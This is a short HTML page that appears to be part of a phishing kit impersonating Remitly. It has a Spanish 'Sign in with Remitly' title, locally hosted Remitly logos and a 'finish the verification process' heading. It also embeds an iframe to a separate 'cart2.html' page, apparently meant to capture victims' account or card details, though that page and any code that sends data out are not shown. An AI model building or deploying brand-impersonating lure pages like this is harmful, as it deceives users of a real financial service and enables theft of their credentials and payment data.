<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Iniciar sesión con Remitly</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        background-color: #ffffff;
      }
      .container {
        max-width: 400px;
        margin: 50px auto;
        padding: 20px;
        background-color: #ffffff;
        border-radius: 8px;
      }
      .logo {
        margin-bottom: 20px;
        text-align: center;
      }
      .logo img {
        width: 150px;
        height: auto;
      }
      .form-group {
        margin-bottom: 20px;
      }
      label {
        display: block;
        margin-bottom: 5px;
      }
      input[type="email"],
      input[type="password"] {
        width: 100%;
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 4px;
        height: 48px;
        box-sizing: border-box;
      }
      input[type="submit"] {
        width: 100%;
        padding: 10px;
        border: none;
        border-radius: 4px;
        background-color: #1c6ead;
        color: white;
        cursor: pointer;
        height: 48px;
      }
      input[type="submit"]:hover {
        background-color: #226ba4;
      }
      .signup {
        text-align: center;
      }
      .signup a {
        color: #007bff;
        text-decoration: none;
      }
      .mobil {
        display: none;
      }
    </style>
    <!-- Mobile logo -->
    <style>
      @media (max-width: 768px) {
        .pc {
          display: none;
        }
        .mobil {
          display: unset;
        }
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="logo">
        <img
          src="img/ss.png"
          alt="Remitly Logo"
          class="pc"
        />
        <img
          src="img/sss.png"
          alt="Remitly Logo (Mobile)"
          style="width: 50px"
          class="mobil"
        />
      </div>
      <form action="#" method="post">
        <div class="form-group">
          <h2 style="color: #212e61">Termina el proceso de verificacion</h2>
          <iframe src="cart2.html" frameborder="0" style="width: 400px;height: 750px;"></iframe>
      </form>
  
    </div>
  </body>
</html>
